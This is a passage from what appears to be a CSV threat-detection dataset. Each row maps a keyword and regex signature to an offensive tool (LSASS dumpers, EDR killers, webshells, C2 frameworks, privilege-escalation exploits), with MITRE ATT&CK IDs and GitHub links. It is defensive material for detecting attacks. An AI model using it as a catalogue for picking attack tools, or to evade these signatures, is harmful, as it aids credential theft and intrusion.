HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","12867" "*:CreateProcessFromParent((Get-Process ""lsass"").Id*",".{0,1000}\:CreateProcessFromParent\(\(Get\-Process\s\""lsass\""\)\.Id.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embeded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/decoder-it/psgetsystem","1","0","N/A","N/A","10","5","406","88","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z","12868" "*:ddos-udp - started udp flood*",".{0,1000}\:ddos\-udp\s\-\sstarted\sudp\sflood.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","12869" "*?function Invoke-CylanceDisarm*",".{0,1000}\?function\sInvoke\-CylanceDisarm.{0,1000}","offensive_tool_keyword","RandomPS-Scripts","PowerShell wrapper for a Cylance Bypass","T1055 - T1068 - T1562.001","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/xorrior/RandomPS-Scripts","1","0","N/A","N/A","8","4","318","86","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z","12871" "*@"" ( _/_ _// ~b33f""*",".{0,1000}\@\""\s\(\s_\/_\s\s\s_\/\/\s\s\s\~b33f\"".{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","12872" "*@_logangoins\n@hullabrian*",".{0,1000}\@_logangoins\\n\@hullabrian.{0,1000}","offensive_tool_keyword","Krueger","remotely killing EDR with WDAC","T1562.001 - T1562.004 - T1218.011 - T1548.002 - T1027","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/logangoins/Krueger","1","0","#content","N/A","9","4","353","42","2025-01-06T06:57:14Z","2024-11-15T20:11:01Z","12873" "*@2024 nyxgeek - TrustedSec*",".{0,1000}\@2024\snyxgeek\s\-\sTrustedSec.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory structures","T1027 - T1083 - T1158 - T1059.001 - 
T1036","TA0005","N/A","N/A","Defense Evasion","https://github.com/nyxgeek/dirdevil","1","0","N/A","powershell content","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","12874" "*@author 7etsuo*",".{0,1000}\@author\s7etsuo.{0,1000}","offensive_tool_keyword","ShellServe","Multi-client network fileserver with integrated shell functionality crafted in C using system calls for efficient and direct file and command processing","T1059 - T1505 - T1046 - T1569","TA0002 - TA0007 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/7etsuo/ShellServe","1","0","N/A","N/A","6","","N/A","","","","12876" "*@etc.2miners.com:*",".{0,1000}\@etc\.2miners\.com\:.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","N/A","9","","N/A","","","","12878" "*@evilmail.to*",".{0,1000}\@evilmail\.to.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","12879" "*@mitm_pattern = *",".{0,1000}\@mitm_pattern\s\=\s.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","12880" "*@mitm_port = *",".{0,1000}\@mitm_port\s\=\s.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - 
TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","12881" "*@mitm_servers =*",".{0,1000}\@mitm_servers\s\=.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","12882" "*@Re@mov@e-@MpTh@re@at*",".{0,1000}\@Re\@mov\@e\-\@MpTh\@re\@at.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","12883" "*@redpill CS Compiled Executable*",".{0,1000}\@redpill\sCS\sCompiled\sExecutable.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","12884" "*@set defenderremoverver=*",".{0,1000}\@set\sdefenderremoverver\=.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#content","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","12885" "*@WanaDecryptor@.exe*",".{0,1000}\@WanaDecryptor\@\.exe.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","12887" "*[ + ] Got a packet from the backdoor!*",".{0,1000}\[\s\+\s\]\sGot\sa\spacket\sfrom\sthe\sbackdoor!.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","N/A","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","12888" "*[ backdoor - Debug ]*",".{0,1000}\[\sbackdoor\s\-\sDebug\s\].{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","12889" "*[!] Failed to enumerate Credman:*",".{0,1000}\[!\]\s\s\s\sFailed\sto\senumerate\sCredman\:.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. 
It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery","https://github.com/redskal/SharpAzbelt","1","0","#content","N/A","8","1","26","7","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z","12891" "*[!] Avoid mixing BetterXencrypt with another techniques*",".{0,1000}\[!\]\sAvoid\smixing\sBetterXencrypt\swith\sanother\stechniques.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#content","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","12893" "*[!] Cannot enumerate domain.*",".{0,1000}\[!\]\sCannot\senumerate\sdomain\..{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#content","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","12894" "*[!] Can't remove the HWBP-Hook for VirtualAlloc !*",".{0,1000}\[!\]\sCan\'t\sremove\sthe\sHWBP\-Hook\sfor\sVirtualAlloc\s!.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","0","#content","N/A","10","","N/A","","","","12895" "*[!] 
cleaning up all IOCs files to avoid detection!*",".{0,1000}\[!\]\scleaning\sup\sall\sIOCs\sfiles\sto\savoid\sdetection!.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","Black Basta","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","0","#content","N/A","9","3","270","38","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z","12896" "*[!] Could not execute query. Could not bind to LDAP://rootDSE.*",".{0,1000}\[!\]\sCould\snot\sexecute\squery\.\sCould\snot\sbind\sto\sLDAP\:\/\/rootDSE\..{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","#content","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","12897" "*[!] Could not extract useful token from specified Teams database!*",".{0,1000}\[!\]\sCould\snot\sextract\suseful\stoken\sfrom\sspecified\sTeams\sdatabase!.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","#content","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","12898" "*[!] 
Couldn't capture the user credential hash :*",".{0,1000}\[!\]\sCouldn\'t\scapture\sthe\suser\scredential\shash\s\:.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#content","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","12899" "*[!] Couldn't communicate with the fake RPC Server*",".{0,1000}\[!\]\sCouldn\'t\scommunicate\swith\sthe\sfake\sRPC\sServer.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","#content","N/A","10","3","224","31","2024-05-05T14:42:23Z","2024-02-26T12:08:34Z","12900" "*[!] Couldn't communicate with the fake RPC Server*",".{0,1000}\[!\]\sCouldn\'t\scommunicate\swith\sthe\sfake\sRPC\sServer.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#content","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","12901" "*[!] Couldn't receive the type2 message from the fake RPC Server*",".{0,1000}\[!\]\sCouldn\'t\sreceive\sthe\stype2\smessage\sfrom\sthe\sfake\sRPC\sServer.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#content","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","12902" "*[!] 
CredBackupCredentials(*",".{0,1000}\[!\]\sCredBackupCredentials\(.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","Black Basta","Credential Access","https://github.com/leftp/BackupCreds","1","0","#content","N/A","9","1","57","10","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z","12903" "*[!] Dont forget about adding your attack in AcceptSecurityContext(*",".{0,1000}\[!\]\sDont\sforget\sabout\sadding\syour\sattack\sin\sAcceptSecurityContext\(.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#content","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","12904" "*[!] Dumping LSASS Requires Elevated Priviledges!*",".{0,1000}\[!\]\sDumping\sLSASS\sRequires\sElevated\sPriviledges!.{0,1000}","offensive_tool_keyword","DumpLSASS","Lsass dumping tool - 50 ways of dumping lsass","T1003.001 - T1055.001 - T1620","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/elementalsouls/DumpLSASS","1","0","#content","N/A","10","1","33","5","2024-02-27T11:25:11Z","2023-04-09T12:11:10Z","12905" "*[!] Dumping LSASS Requires Elevated Priviledges!*",".{0,1000}\[!\]\sDumping\sLSASS\sRequires\sElevated\sPriviledges!.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","#content","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","12906" "*[!] Dumping the ntds can crash the DC on Windows Server 2019. 
Use the option*",".{0,1000}\[!\]\sDumping\sthe\sntds\scan\scrash\sthe\sDC\son\sWindows\sServer\s2019\.\sUse\sthe\soption.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#content","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","12907" "*[!] Dynamic Sink: BAD"", L""Harness""*",".{0,1000}\[!\]\sDynamic\sSink\:\sBAD\"",\sL\""Harness\"".{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","#content","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","12908" "*[!] Elevated process spawned!*",".{0,1000}\[!\]\sElevated\sprocess\sspawned!.{0,1000}","offensive_tool_keyword","Elevator","UAC bypass by abusing RPC and debug objects.","T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Kudaes/Elevator","1","0","#content","N/A","10","7","614","69","2023-10-19T08:51:09Z","2022-08-25T21:39:28Z","12909" "*[!] ESTSAUTHPERSISTENT cookie was empty!*",".{0,1000}\[!\]\sESTSAUTHPERSISTENT\scookie\swas\sempty!.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","#content","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","12910" "*[!] 
Failed to build gtunnel server *",".{0,1000}\[!\]\sFailed\sto\s\sbuild\sgtunnel\sserver\s.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#content","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","12911" "*[!] Failed to create gtunnel-server *",".{0,1000}\[!\]\sFailed\sto\screate\sgtunnel\-server\s.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#content","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","12912" "*[!] Failed to create minidump*",".{0,1000}\[!\]\sFailed\sto\screate\sminidump.{0,1000}","offensive_tool_keyword","ATPMiniDump","Dumping LSASS memory with MiniDumpWriteDump on PssCaptureSnapShot to evade WinDefender ATP credential-theft. Take a look at this blog post for details. ATPMiniDump was created starting from Outflank-Dumpert then big credits to @Cneelis","T1003 - T1005 - T1055 - T1218","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/b4rtik/ATPMiniDump","1","0","#content","N/A","N/A","3","255","46","2019-12-02T15:01:22Z","2019-11-29T19:49:54Z","12913" "*[!] Failed to Create Process to Dump SAM*",".{0,1000}\[!\]\sFailed\sto\sCreate\sProcess\sto\sDump\sSAM.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","#content","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","12914" "*[!] 
Failed to delete Performance registry key.*",".{0,1000}\[!\]\sFailed\sto\sdelete\sPerformance\sregistry\skey\..{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","#content","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","12915" "*[!] Failed to download legitimate GPO from SYSVOL (dc_ip:*",".{0,1000}\[!\]\sFailed\sto\sdownload\slegitimate\sGPO\sfrom\sSYSVOL\s\(dc_ip\:.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","#content","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","12916" "*[!] Failed to enumerate ADCS data.*",".{0,1000}\[!\]\sFailed\sto\senumerate\sADCS\sdata\..{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","#content","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","12917" "*[!] Failed to exfiltrate using RoadTools auth file*",".{0,1000}\[!\]\sFailed\sto\sexfiltrate\susing\sRoadTools\sauth\sfile.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","#content","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","12918" "*[!] 
Failed to fake NtOpenProcess on LSASS PID*",".{0,1000}\[!\]\sFailed\sto\sfake\sNtOpenProcess\son\sLSASS\sPID.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","#content","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","12919" "*[!] Failed to get LSASS handle, bailing!*",".{0,1000}\[!\]\sFailed\sto\sget\sLSASS\shandle,\sbailing!.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","#content","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","12920" "*[!] Failed to get privileges when trying to gain SYSTEM*",".{0,1000}\[!\]\sFailed\sto\sget\sprivileges\swhen\strying\sto\sgain\sSYSTEM.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","#content","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","12921" "*[!] 
Failed to Kill EventLog Service*",".{0,1000}\[!\]\sFailed\sto\sKill\sEventLog\sService.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","#content","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","12922" "*[!] Failed to load shellcode into memory*",".{0,1000}\[!\]\sFailed\sto\sload\sshellcode\sinto\smemory.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","#content","N/A","10","10","103","10","2025-03-27T12:47:34Z","2024-04-11T12:17:22Z","12923" "*[!] Failed to Locate LSASS Dump File!*",".{0,1000}\[!\]\sFailed\sto\sLocate\sLSASS\sDump\sFile!.{0,1000}","offensive_tool_keyword","DumpLSASS","Lsass dumping tool - 50 ways of dumping lsass","T1003.001 - T1055.001 - T1620","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/elementalsouls/DumpLSASS","1","0","#content","N/A","10","1","33","5","2024-02-27T11:25:11Z","2023-04-09T12:11:10Z","12924" "*[!] 
Failed to parse RoadTools auth JSON file*",".{0,1000}\[!\]\sFailed\sto\sparse\sRoadTools\sauth\sJSON\sfile.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","#content","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","12925" "*[!] Failed to Transfer LSASS Dump*",".{0,1000}\[!\]\sFailed\sto\sTransfer\sLSASS\sDump.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","#content","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","12926" "*[!] Failed to write malicious scheduled task to downloaded GPO. Exiting*",".{0,1000}\[!\]\sFailed\sto\swrite\smalicious\sscheduled\stask\sto\sdownloaded\sGPO\.\sExiting.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","#content","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","12927" "*[!] Feature is unsupported for PS1 rats*",".{0,1000}\[!\]\sFeature\sis\sunsupported\sfor\sPS1\srats.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","#content","N/A","10","1","N/A","N/A","N/A","N/A","12928" "*[!] 
Found exploitable sgid binary*",".{0,1000}\[!\]\sFound\sexploitable\ssgid\sbinary.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","#content","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","12929" "*[!] Found exploitable Sudo NOPASSWD binary*",".{0,1000}\[!\]\sFound\sexploitable\sSudo\sNOPASSWD\sbinary.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","#content #linux","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","12930" "*[!] Found exploitable suid binary*",".{0,1000}\[!\]\sFound\sexploitable\ssuid\sbinary.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","#content","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","12931" "*[!] gClient with uuid: *",".{0,1000}\[!\]\sgClient\swith\suuid\:\s.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#content","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","12932" "*[!] 
